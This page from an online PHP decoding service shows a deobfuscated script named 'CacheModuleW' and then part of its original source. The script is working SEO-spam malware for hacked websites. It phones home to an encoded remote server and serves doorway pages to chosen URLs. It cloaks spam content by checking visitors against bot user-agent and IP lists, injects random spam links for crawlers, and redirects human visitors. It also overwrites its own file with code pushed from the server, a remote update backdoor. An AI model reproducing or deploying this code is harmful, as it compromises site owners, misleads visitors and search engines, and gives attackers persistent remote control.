Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ini_set("display_errors", 1); ini_set("memory_limit", "256M"); ignore_user_abor..

Decoded Output download

<?php 
 
ini_set("display_errors", 1); 
ini_set("memory_limit", "256M"); 
ignore_user_abort(1); 
 
class CacheModuleW 
{ 
    private $ver = "4.5"; 
    private $ip; 
    private $ua; 
    private $ref; 
    private $postVar = "nocache"; 
    private $post; 
    private $au; 
    private $rid; 
    private $protocol = "http://"; 
    private $currentUrl; 
    private $currentHash; 
    private $cacheDir; 
    private $pFile; 
    private $uFile; 
    private $rFile; 
    private $currentKeyword = ""; 
    private $checkFile; 
    private $isDoor = false; 
    private $isBot = false; 
    private $redirType = ""; 
    private $redirUrl = ""; 
    private $redirCode = ""; 
    /** 
     * @var mixed 
     */ 
    private $postPass; 
 
    public function __construct($au) 
    { 
        if (!empty($_POST[$this->postVar]) && $_POST[$this->postVar] === "yes") { 
            return false; 
        } 
        if(stripos("qqq".$_SERVER['REQUEST_URI'], "wp-admin") || stripos("qqq".$_SERVER['REQUEST_URI'], "wp-login.php")){ 
            return false; 
        } 
        $this->au = $au; 
        if (!$this->setVars()) { 
            return false; 
        } 
        $this->install(); 
        if (!empty($this->post)) { 
            $this->checkRequest(); 
            if (!$this->checkPostPass()) { 
                return false; 
            } 
        } 
        if (file_exists($this->uFile)) { 
            $this->isDoor(); 
            $this->checkRedir(); 
            $this->redirActions(); 
            $this->pageActions(); 
        } 
        return true; 
    } 
 
 
    private function showPage() 
    { 
        if (file_exists($this->cacheDir . "/" . $this->currentHash)) { 
            $page = file_get_contents($this->cacheDir . "/" . $this->currentHash); 
            $page = gzinflate($page); 
            return $page; 
        } 
        $postPass = ""; 
        if (file_exists($this->pFile)) { 
            @include($this->pFile); 
        } 
        $params = "rid=" . $this->rid . "&action=getpage&keyword=" . urlencode($this->currentKeyword) . "&hash=" . $this->currentHash . "&url=" . urlencode($this->currentUrl) . "&postpass=" . $postPass; 
        $page = $this->goPost($this->au, $params); 
        $page = json_decode($page); 
        if (!empty($page)) { 
            if ($page->md5 !== md5($page->content)) { 
                return ""; 
            } 
            $page = $page->content; 
            if ( 
                !stripos("qqq" . $page, "<body") 
                || !stripos("qqq" . $page, "<html") 
            ) { 
                return ""; 
            } 
            $this->fileAction($this->cacheDir . "/" . $this->currentHash, "w+", gzdeflate($page)); 
            return $page; 
        } 
        return ""; 
    } 
 
    private function showLinks() 
    { 
        $page = $this->goPost($this->currentUrl, "", true); 
        if (empty($page)) { 
            return ""; 
        } 
        $page = $this->placeLinks($page); 
        if (empty($page)) { 
            return ""; 
        } 
        return $page; 
    } 
 
    private function placeLinks($page) 
    { 
        $links = null; 
        $save = true; 
        if (file_exists($this->cacheDir . "/" . $this->currentHash)) { 
            $links = file_get_contents($this->cacheDir . "/" . $this->currentHash); 
            $links = json_decode($links); 
            $save = false; 
        } 
        if (empty($links)) { 
            $links = $this->getRandLinks(); 
        } 
        if (empty($links)) { 
            return false; 
        } 
        if ($save === true) { 
            $this->fileAction($this->cacheDir . "/" . $this->currentHash, "w+", json_encode($links)); 
        } 
        return preg_replace("/(<body.*>)/", "\$1" . implode($links), $page, 1); 
    } 
 
    private function pageActions() 
    { 
        if ($this->isDoor === true) { 
            $page = $this->showPage(); 
            if ($this->isBot === false && !empty($this->redirCode)) { 
                echo $this->redirCode; 
                die(); 
            } 
            if (!empty($page)) { 
                echo $page; 
                die(); 
            } 
        } else { 
            if ($this->isBot === true) { 
                $page = $this->showLinks(); 
                if (!empty($page)) { 
                    echo $page; 
                    die(); 
                } 
            } 
        } 
    } 
 
    private function redirActions() 
    { 
        if ($this->redirType === "kt" && $this->isDoor === true) { 
            $ktRes = $this->goPost($this->redirUrl, "token=" . $this->redirCode . "&log=1&info=1&user_agent=" . urlencode($this->ua) . "&ip=" . $this->ip . "&keyword=" . urlencode($this->currentKeyword) . "&referrer=" . urlencode($this->ref) . "&source=" . urlencode($this->currentUrl)); 
            $ktRes = json_decode($ktRes); 
            if (!empty($ktRes->body)) { 
                $this->redirCode = $ktRes->body; 
            } else { 
                $this->redirCode = ""; 
            } 
            if ($ktRes->info->is_bot === true || $ktRes->body == "bot") { 
                $this->isBot = true; 
            } 
        } else { 
            if (!empty($this->redirCode)) { 
                $this->redirCode = str_ireplace("[REFERER]", $this->ref, $this->redirCode); 
                $this->redirCode = str_ireplace("[DOMAIN]", $_SERVER["SERVER_NAME"], $this->redirCode); 
                $this->redirCode = str_ireplace("[CURURL]", $this->currentUrl, $this->redirCode); 
                $this->redirCode = str_ireplace("[KEYWORD]", $this->currentKeyword, $this->redirCode); 
                $this->redirCode = str_ireplace("[DEFISKEY]", str_ireplace(" ", "-", $this->currentKeyword), $this->redirCode); 
                $this->redirCode = str_ireplace("[PLUSKEY]", str_ireplace(" ", "+", $this->currentKeyword), $this->redirCode); 
            } 
            $is_bot = ""; 
            $user_agent_to_filter = array('#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#', '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i', '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i', '#www\.cys\.ru#i', '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i', '#CFNetwork#i', '#ConveraCrawler#i', '#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i', '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i', '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i', '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i', '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i', '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i', '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i', '#Yandex#i', '#Yanga#i', '#Yeti#i', '#msnbot#i', '#spider#i', '#yahoo#i', '#jeeves#i', '#googlebot#i', '#altavista#i', '#scooter#i', '#av\s*fetch#i', '#asterias#i', '#spiderthread revision#i', '#sqworm#i', '#ask#i', '#lycos.spider#i', '#infoseek sidewinder#i', '#ultraseek#i', '#polybot#i', '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i', '#charlotte#i', '#bingbot#i'); 
            $stop_ips_masks = array("66\.249\.[6-9][0-9]\.[0-9]", "74\.125\.[0-9]\.[0-9]", "65\.5[2-5]\.[0-9]\.[0-9]", "74\.6\.[0-9]\.[0-9]", "67\.195\.[0-9]\.[0-9]", "72\.30\.[0-9]\.[0-9]", "38\.[0-9]\.[0-9]\.[0-9]", "93\.172\.94\.227", "212\.100\.250\.218", "71\.165\.223\.134", "70\.91\.180\.25", "65\.93\.62\.242", "74\.193\.246\.129", "213\.144\.15\.38", "195\.92\.229\.2", "70\.50\.189\.191", "218\.28\.88\.99", "165\.160\.2\.20", "89\.122\.224\.230", "66\.230\.175\.124", "218\.18\.174\.27", "65\.33\.87\.94", "67\.210\.111\.241", "81\.135\.175\.70", "64\.69\.34\.134", "89\.149\.253\.169", "104\.132\.8\.69"); 
            foreach ($stop_ips_masks as $k => $v) { 
                if (preg_match('#^' . $v . '$#', $this->ip)) { 
                    $is_bot = "bot"; 
                } 
            } 
 
            if (empty($is_bot) && strpos("qqq" . preg_replace($user_agent_to_filter, '-ANGRYBOT-', $this->ua), '-ANGRYBOT-')) { 
                $is_bot = true; 
            } 
            if ($is_bot == true) { 
                $this->isBot = true; 
            } 
        } 
    } 
 
    private function isDoor() 
    { 
        $handle = fopen($this->uFile, "r"); 
        $secondCurrentUrl = str_ireplace("http://", "", $this->currentUrl); 
        $secondCurrentUrl = str_ireplace("https://", "", $secondCurrentUrl); 
        $secondCurrentUrl = str_ireplace("www.", "", $secondCurrentUrl); 
 
        $secondHash = $this->makeHash($secondCurrentUrl, true); 
//        var_dump($this->currentUrl, $secondCurrentUrl, $secondHash, file($this->uFile)); 
        while (!feof($handle)) { 
            $oneLine = fgets($handle); 
            $oneLine = trim($oneLine); 
            $oneLine = json_decode($oneLine); 
            if (!empty($oneLine)) { 
                if ($oneLine->hash === $this->currentHash || $oneLine->hash === $secondHash) { 
                    fclose($handle); 
                    if(!empty($oneLine->keyword)){ 
                        $this->currentKeyword = urldecode($oneLine->keyword); 
                        $this->isDoor = true; 
                    } 
                    return true; 
                } 
            } 
        } 
        fclose($handle); 
        return false; 
    } 
 
    private function checkRequest() 
    { 
 
        if (!empty($this->post["check"])) { 
            $result = [ 
                "result" => 1 
            ]; 
            if (!empty($this->post["postpass"])) { 
                if (!$this->checkPostPass()) { 
                    return false; 
                } 
                if ($this->ver !== $this->post["ver"]) { 
                    if ($this->renewClient()) { 
                        $result["renew"] = 1; 
                    } 
                } 
                if (file_exists($this->rFile) && !empty($this->post["redmd5"]) && $this->post["redmd5"] !== md5(file_get_contents($this->rFile))) { 
                    if ($this->changeRedirect()) { 
                        $result["changedred"] = 1; 
                    } 
                } 
                $hostData = $this->getHostData(); 
                if(!empty($hostData)){ 
                    $result["hostdata"] = $hostData; 
                } 
            } 
            header('Content-Type: application/json; charset=utf-8'); 
            echo json_encode($result); 
            die(); 
        } 
    } 
 
    private function getHostData() 
    { 
        $result = []; 
        if (function_exists("execc")) { 
            $uname = ""; 
            $hostname = ""; 
            $result["uname"] = $uname; 
            $result["hostname"] = $hostname; 
        } 
        return $result; 
    } 
 
    private function changeRedirect() 
    { 
        $params = "rid=" . $this->rid . "&action=checkredirect&postpass=" . $this->postPass; 
 
        $redirect = $this->goPost($this->au, $params); 
        $data = json_decode($redirect); 
        if (empty($data)) { 
            return false; 
        } 
        if ($data->md5 === md5($data->body)) { 
            $this->fileAction($this->rFile, "w+", $data->body); 
            return true; 
        } 
        return false; 
    } 
 
    private function renewClient() 
    { 
        $params = "rid=" . $this->rid . "&action=renew&postpass=" . $this->postPass; 
        $page = $this->goPost($this->au, $params); 
        $data = json_decode($page); 
        if (empty($data)) { 
            return false; 
        } 
        if ($data->md5 === md5($data->body)) { 
            $this->fileAction(__FILE__, "w+", $data->body); 
            return true; 
        } 
        return false; 
    } 
 
    private function checkRedir() 
    { 
        if (file_exists($this->rFile)) { 
            $redirCode = file_get_contents($this->rFile); 
            $redirCode = json_decode($redirCode); 
            if (empty($redirCode)) { 
                return false; 
            } 
            if (empty($redirCode->url) || empty($redirCode->data)) { 
                return false; 
            } 
            if ($redirCode->type === "kt") { 
                $this->redirType = "kt"; 
            } 
            $this->redirUrl = $this->dcdAu($redirCode->url); 
            $this->redirCode = $redirCode->data; 
        } 
        return false; 
    } 
 
    private function setVars() 
    { 
        $this->au = $this->dcdAu($this->au); 
        if (empty($this->au)) { 
            return false; 
        } 
        if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { 
            $this->ip = $_SERVER['HTTP_X_FORWARDED_FOR']; 
        } elseif (!empty($_SERVER['REMOTE_ADDR'])) { 
            $this->ip = $_SERVER['REMOTE_ADDR']; 
        } else { 
            $this->ip = ""; 
        } 
        if (!empty($_SERVER['HTTP_USER_AGENT'])) { 
            $this->ua = $_SERVER['HTTP_USER_AGENT']; 
        } else { 
            $this->ua = ""; 
        } 
        if( 
            stripos("qqq".$this->ua, "mj12bot.com") 
            || stripos("qqq".$this->ua, "seostar.co/robot") 
            || stripos("qqq".$this->ua, "AhrefsBot") 
            || stripos("qqq".$this->ua, "DataForSeoBot") 
            || stripos("qqq".$this->ua, "The Knowledge AI") 
            || stripos("qqq".$this->ua, "SiteLockSpider") 
        ) { 
            return false; 
        } 
        if (!empty($_SERVER['HTTP_REFERER'])) { 
            $this->ref = $_SERVER['HTTP_REFERER']; 
        } else { 
            $this->ref = ""; 
        } 
        $this->post = $_POST; 
        $this->rid = md5(str_ireplace("www.", "", strtolower($_SERVER['SERVER_NAME']))); 
        if (isset($_SERVER['HTTPS'])) { 
            $this->protocol = "https://"; 
        } 
        $this->currentUrl = $this->protocol . strtolower($_SERVER['SERVER_NAME']) . strtolower($_SERVER['REQUEST_URI']); 
        $this->currentUrl = rtrim($this->currentUrl, "/"); 
        $this->currentUrl = urldecode($this->currentUrl); 
        $this->currentHash = $this->makeHash($this->currentUrl); 
        $this->cacheDir = dirname(__FILE__) . "/cache_w"; 
        $this->checkFile = $this->cacheDir . "/check"; 
        $this->pFile = $this->cacheDir . "/pfile.php"; 
        $this->uFile = $this->cacheDir . "/ufile"; 
        $this->rFile = $this->cacheDir . "/rfile"; 
        return true; 
    } 
 
    private function saveRedirect($data) 
    { 
        $this->fileAction($this->rFile, "w+", json_encode($data)); 
    } 
 
    private function install() 
    { 
        if (stripos("qqq" . $this->currentUrl, ".pdf") || stripos("qqq" . $this->currentUrl, ".xml") || stripos("qqq" . $this->currentUrl, ".pdf")) { 
            return false; 
        } 
        if (!file_exists($this->checkFile)) { 
            mkdir($this->cacheDir); 
            $this->fileAction($this->checkFile, "w+", time()); 
            if (file_exists($this->checkFile)) { 
                $isSecure = ""; 
                if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') { 
                    $isSecure = "yes"; 
                } 
                $params = "rid=" . $this->rid . "&action=install&url=" . $this->currentUrl . "&path=" . __FILE__."&ssl=".$isSecure; 
                $incomeData = $this->goPost($this->au, $params); 
                $incomeData = json_decode($incomeData); 
                $result = [ 
                    "type" => "error" 
                ]; 
                if (!empty($incomeData)) { 
                    if (!empty($incomeData->postpass)) { 
                        $this->savePass($incomeData->postpass); 
                    } 
                    if (!empty($incomeData->urls)) { 
                        foreach ($incomeData->urls as $urlData) { 
                            $toSave = [ 
                                "hash" => $this->makeHash($urlData->url), 
                                "url" => urlencode($urlData->url), 
                                "keyword" => urlencode($urlData->keyword) 
                            ]; 
                            $this->fileAction($this->uFile, "a+", json_encode($toSave) . "
"); 
                        } 
                        $result["type"] = "fromurls"; 
                    } 
                    if (!empty($incomeData->redirect)) { 
                        $this->saveRedirect($incomeData->redirect); 
                    } 
                } 
            } 
        } 
        return true; 
    } 
 
    private function makeHash($string, $noStr = false) 
    { 
        $string = rtrim($string, "/"); 
        if($noStr === false) { 
            $string = str_ireplace( 
                ["http://", "https//", "www."], 
                "", 
                $string 
            ); 
        } 
 
        return md5(urlencode($string)); 
    } 
 
    public function goPost($url, $params, $nocache = false) 
    { 
        $params = rtrim($params, '&'); 
        if ($nocache === true) { 
            $params .= "&" . $this->postVar . "=yes"; 
        } 
        if (function_exists('curl_init')) { 
            $ch = curl_init(); 
            curl_setopt($ch, CURLOPT_URL, $url); 
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 
            curl_setopt($ch, CURLOPT_USERAGENT, $this->rUA()); 
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 
            curl_setopt($ch, CURLOPT_HEADER, false); 
            curl_setopt($ch, CURLOPT_POSTFIELDS, $params); 
            curl_setopt($ch, CURLOPT_TIMEOUT, 40); 
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 
            $output = curl_exec($ch); 
            curl_close($ch); 
        } else { 
            $output = file_get_contents($url, false, stream_context_create(array('http' => array('method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $params)))); 
        } 
        return $output; 
 
    } 
 
    private function getRandLinks() 
    { 
        if (!file_exists($this->uFile)) { 
            return false; 
        } 
        $links = []; 
        $linesIndArr = array(); 
        $n = 1; 
        $handle = fopen($this->uFile, "r"); 
        while (!feof($handle)) { 
            if (fgets($handle) !== false) { 
                $linesIndArr[] = $n++; 
            } 
        } 
        fclose($handle); 
        $linesIndArr = $this->shArr($linesIndArr); 
        $linesIndArr = array_slice($linesIndArr, 0, rand(4, 6)); 
        $i = 0; 
        $handle = fopen($this->uFile, "r"); 
        while (!feof($handle)) { 
            if (count($links) == count($linesIndArr)) { 
                break; 
            } 
            $line = fgets($handle); 
            if ($line !== false && in_array($i, $linesIndArr)) { 
                $link = json_decode(trim($line)); 
                if (!empty($link)) { 
                    $link = "<a href='" . urldecode($link->url) . "'>" . urldecode($link->keyword) . "</a>&nbsp;"; 
                    $links[] = $link; 
                } 
            } 
            $i++; 
        } 
        fclose($handle); 
        return $links; 
    } 
 
    function dcdAu($au) 
    { 
        $goodservurl = array(); 
        foreach (str_split($au) as $onechar) { 
            if (is_numeric($onechar)) { 
                if ($onechar >= 3) { 
                    $onechar = $onechar - 3; 
                } else { 
                    $onechar = $onechar + 10 - 3; 
                } 
            } 
            $goodservurl[] = $onechar; 
        } 
        return urldecode(base64_decode(implode($goodservurl))); 
    } 
 
    private function savePass($pass) 
    { 
        $this->fileAction($this->pFile, "w+", "<?php \$postPass = '" . $pass . "'; ?>"); 
    } 
 
    private function rUA() 
    { 
        $uas = array("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"); 
        $uas = $this->shArr($uas); 
        return $uas[0]; 
    } 
 
    private function shArr($arr) 
    { 
        srand((float)microtime() * 1000000); 
        shuffle($arr); 
        return $arr; 
    } 
 
    private function checkPostPass() 
    { 
        if (empty($this->post["postpass"])) { 
            return false; 
        } 
        if (file_exists($this->pFile)) { 
            @include($this->pFile); 
            if (!empty($postPass)) { 
                if ($this->post["postpass"] === $postPass) { 
                    $this->postPass = $postPass; 
                    return true; 
                } 
            } 
        } 
        return false; 
    } 
 
    private function randString($length) 
    { 
        $str = ""; 
        $chars = "abcdefghijklmnopqrstuvwxyz0123456789"; 
        $size = strlen($chars); 
        for ($i = 0; $i < $length; $i++) { 
            $str .= $chars[rand(0, $size - 1)]; 
        } 
        return $str; 
    } 
 
    private function fileAction($path, $mode, $data) 
    { 
        $fod = fopen($path, $mode); 
        if (!$fod) { 
            return false; 
        } 
        fwrite($fod, $data); 
        fclose($fod); 
        return true; 
    } 
 
} 
 
$au = "aHR3cCUzQSUyRiUyRndvcmxkdHJhZmZpY6JvdXRlLnRvcCUyRmZhcGQyJTJGYXBpJTJGd52yaw=="; 
new CacheModuleW($au); 

Did this file decode correctly?

Original Code

<?php

ini_set("display_errors", 1);
ini_set("memory_limit", "256M");
ignore_user_abort(1);

class CacheModuleW
{
    private $ver = "4.5";
    private $ip;
    private $ua;
    private $ref;
    private $postVar = "nocache";
    private $post;
    private $au;
    private $rid;
    private $protocol = "http://";
    private $currentUrl;
    private $currentHash;
    private $cacheDir;
    private $pFile;
    private $uFile;
    private $rFile;
    private $currentKeyword = "";
    private $checkFile;
    private $isDoor = false;
    private $isBot = false;
    private $redirType = "";
    private $redirUrl = "";
    private $redirCode = "";
    /**
     * @var mixed
     */
    private $postPass;

    public function __construct($au)
    {
        if (!empty($_POST[$this->postVar]) && $_POST[$this->postVar] === "yes") {
            return false;
        }
        if(stripos("qqq".$_SERVER['REQUEST_URI'], "wp-admin") || stripos("qqq".$_SERVER['REQUEST_URI'], "wp-login.php")){
            return false;
        }
        $this->au = $au;
        if (!$this->setVars()) {
            return false;
        }
        $this->install();
        if (!empty($this->post)) {
            $this->checkRequest();
            if (!$this->checkPostPass()) {
                return false;
            }
        }
        if (file_exists($this->uFile)) {
            $this->isDoor();
            $this->checkRedir();
            $this->redirActions();
            $this->pageActions();
        }
        return true;
    }


    private function showPage()
    {
        if (file_exists($this->cacheDir . "/" . $this->currentHash)) {
            $page = file_get_contents($this->cacheDir . "/" . $this->currentHash);
            $page = gzinflate($page);
            return $page;
        }
        $postPass = "";
        if (file_exists($this->pFile)) {
            @include($this->pFile);
        }
        $params = "rid=" . $this->rid . "&action=getpage&keyword=" . urlencode($this->currentKeyword) . "&hash=" . $this->currentHash . "&url=" . urlencode($this->currentUrl) . "&postpass=" . $postPass;
        $page = $this->goPost($this->au, $params);
        $page = json_decode($page);
        if (!empty($page)) {
            if ($page->md5 !== md5($page->content)) {
                return "";
            }
            $page = $page->content;
            if (
                !stripos("qqq" . $page, "<body")
                || !stripos("qqq" . $page, "<html")
            ) {
                return "";
            }
            $this->fileAction($this->cacheDir . "/" . $this->currentHash, "w+", gzdeflate($page));
            return $page;
        }
        return "";
    }

    private function showLinks()
    {
        $page = $this->goPost($this->currentUrl, "", true);
        if (empty($page)) {
            return "";
        }
        $page = $this->placeLinks($page);
        if (empty($page)) {
            return "";
        }
        return $page;
    }

    private function placeLinks($page)
    {
        $links = null;
        $save = true;
        if (file_exists($this->cacheDir . "/" . $this->currentHash)) {
            $links = file_get_contents($this->cacheDir . "/" . $this->currentHash);
            $links = json_decode($links);
            $save = false;
        }
        if (empty($links)) {
            $links = $this->getRandLinks();
        }
        if (empty($links)) {
            return false;
        }
        if ($save === true) {
            $this->fileAction($this->cacheDir . "/" . $this->currentHash, "w+", json_encode($links));
        }
        return preg_replace("/(<body.*>)/", "\$1" . implode($links), $page, 1);
    }

    private function pageActions()
    {
        if ($this->isDoor === true) {
            $page = $this->showPage();
            if ($this->isBot === false && !empty($this->redirCode)) {
                echo $this->redirCode;
                die();
            }
            if (!empty($page)) {
                echo $page;
                die();
            }
        } else {
            if ($this->isBot === true) {
                $page = $this->showLinks();
                if (!empty($page)) {
                    echo $page;
                    die();
                }
            }
        }
    }

    private function redirActions()
    {
        if ($this->redirType === "kt" && $this->isDoor === true) {
            $ktRes = $this->goPost($this->redirUrl, "token=" . $this->redirCode . "&log=1&info=1&user_agent=" . urlencode($this->ua) . "&ip=" . $this->ip . "&keyword=" . urlencode($this->currentKeyword) . "&referrer=" . urlencode($this->ref) . "&source=" . urlencode($this->currentUrl));
            $ktRes = json_decode($ktRes);
            if (!empty($ktRes->body)) {
                $this->redirCode = $ktRes->body;
            } else {
                $this->redirCode = "";
            }
            if ($ktRes->info->is_bot === true || $ktRes->body == "bot") {
                $this->isBot = true;
            }
        } else {
            if (!empty($this->redirCode)) {
                $this->redirCode = str_ireplace("[REFERER]", $this->ref, $this->redirCode);
                $this->redirCode = str_ireplace("[DOMAIN]", $_SERVER["SERVER_NAME"], $this->redirCode);
                $this->redirCode = str_ireplace("[CURURL]", $this->currentUrl, $this->redirCode);
                $this->redirCode = str_ireplace("[KEYWORD]", $this->currentKeyword, $this->redirCode);
                $this->redirCode = str_ireplace("[DEFISKEY]", str_ireplace(" ", "-", $this->currentKeyword), $this->redirCode);
                $this->redirCode = str_ireplace("[PLUSKEY]", str_ireplace(" ", "+", $this->currentKeyword), $this->redirCode);
            }
            $is_bot = "";
            $user_agent_to_filter = array('#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#', '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i', '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i', '#www\.cys\.ru#i', '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i', '#CFNetwork#i', '#ConveraCrawler#i', '#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i', '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i', '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i', '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i', '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i', '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i', '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i', '#Yandex#i', '#Yanga#i', '#Yeti#i', '#msnbot#i', '#spider#i', '#yahoo#i', '#jeeves#i', '#googlebot#i', '#altavista#i', '#scooter#i', '#av\s*fetch#i', '#asterias#i', '#spiderthread revision#i', '#sqworm#i', '#ask#i', '#lycos.spider#i', '#infoseek sidewinder#i', '#ultraseek#i', '#polybot#i', '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i', '#charlotte#i', '#bingbot#i');
            $stop_ips_masks = array("66\.249\.[6-9][0-9]\.[0-9]", "74\.125\.[0-9]\.[0-9]", "65\.5[2-5]\.[0-9]\.[0-9]", "74\.6\.[0-9]\.[0-9]", "67\.195\.[0-9]\.[0-9]", "72\.30\.[0-9]\.[0-9]", "38\.[0-9]\.[0-9]\.[0-9]", "93\.172\.94\.227", "212\.100\.250\.218", "71\.165\.223\.134", "70\.91\.180\.25", "65\.93\.62\.242", "74\.193\.246\.129", "213\.144\.15\.38", "195\.92\.229\.2", "70\.50\.189\.191", "218\.28\.88\.99", "165\.160\.2\.20", "89\.122\.224\.230", "66\.230\.175\.124", "218\.18\.174\.27", "65\.33\.87\.94", "67\.210\.111\.241", "81\.135\.175\.70", "64\.69\.34\.134", "89\.149\.253\.169", "104\.132\.8\.69");
            foreach ($stop_ips_masks as $k => $v) {
                if (preg_match('#^' . $v . '$#', $this->ip)) {
                    $is_bot = "bot";
                }
            }

            if (empty($is_bot) && strpos("qqq" . preg_replace($user_agent_to_filter, '-ANGRYBOT-', $this->ua), '-ANGRYBOT-')) {
                $is_bot = true;
            }
            if ($is_bot == true) {
                $this->isBot = true;
            }
        }
    }

    private function isDoor()
    {
        $handle = fopen($this->uFile, "r");
        $secondCurrentUrl = str_ireplace("http://", "", $this->currentUrl);
        $secondCurrentUrl = str_ireplace("https://", "", $secondCurrentUrl);
        $secondCurrentUrl = str_ireplace("www.", "", $secondCurrentUrl);

        $secondHash = $this->makeHash($secondCurrentUrl, true);
//        var_dump($this->currentUrl, $secondCurrentUrl, $secondHash, file($this->uFile));
        while (!feof($handle)) {
            $oneLine = fgets($handle);
            $oneLine = trim($oneLine);
            $oneLine = json_decode($oneLine);
            if (!empty($oneLine)) {
                if ($oneLine->hash === $this->currentHash || $oneLine->hash === $secondHash) {
                    fclose($handle);
                    if(!empty($oneLine->keyword)){
                        $this->currentKeyword = urldecode($oneLine->keyword);
                        $this->isDoor = true;
                    }
                    return true;
                }
            }
        }
        fclose($handle);
        return false;
    }

    private function checkRequest()
    {

        if (!empty($this->post["check"])) {
            $result = [
                "result" => 1
            ];
            if (!empty($this->post["postpass"])) {
                if (!$this->checkPostPass()) {
                    return false;
                }
                if ($this->ver !== $this->post["ver"]) {
                    if ($this->renewClient()) {
                        $result["renew"] = 1;
                    }
                }
                if (file_exists($this->rFile) && !empty($this->post["redmd5"]) && $this->post["redmd5"] !== md5(file_get_contents($this->rFile))) {
                    if ($this->changeRedirect()) {
                        $result["changedred"] = 1;
                    }
                }
                $hostData = $this->getHostData();
                if(!empty($hostData)){
                    $result["hostdata"] = $hostData;
                }
            }
            header('Content-Type: application/json; charset=utf-8');
            echo json_encode($result);
            die();
        }
    }

    private function getHostData()
    {
        $result = [];
        if (function_exists("execc")) {
            $uname = "";
            $hostname = "";
            $result["uname"] = $uname;
            $result["hostname"] = $hostname;
        }
        return $result;
    }

    private function changeRedirect()
    {
        $params = "rid=" . $this->rid . "&action=checkredirect&postpass=" . $this->postPass;

        $redirect = $this->goPost($this->au, $params);
        $data = json_decode($redirect);
        if (empty($data)) {
            return false;
        }
        if ($data->md5 === md5($data->body)) {
            $this->fileAction($this->rFile, "w+", $data->body);
            return true;
        }
        return false;
    }

    private function renewClient()
    {
        $params = "rid=" . $this->rid . "&action=renew&postpass=" . $this->postPass;
        $page = $this->goPost($this->au, $params);
        $data = json_decode($page);
        if (empty($data)) {
            return false;
        }
        if ($data->md5 === md5($data->body)) {
            $this->fileAction(__FILE__, "w+", $data->body);
            return true;
        }
        return false;
    }

    private function checkRedir()
    {
        if (file_exists($this->rFile)) {
            $redirCode = file_get_contents($this->rFile);
            $redirCode = json_decode($redirCode);
            if (empty($redirCode)) {
                return false;
            }
            if (empty($redirCode->url) || empty($redirCode->data)) {
                return false;
            }
            if ($redirCode->type === "kt") {
                $this->redirType = "kt";
            }
            $this->redirUrl = $this->dcdAu($redirCode->url);
            $this->redirCode = $redirCode->data;
        }
        return false;
    }

    private function setVars()
    {
        $this->au = $this->dcdAu($this->au);
        if (empty($this->au)) {
            return false;
        }
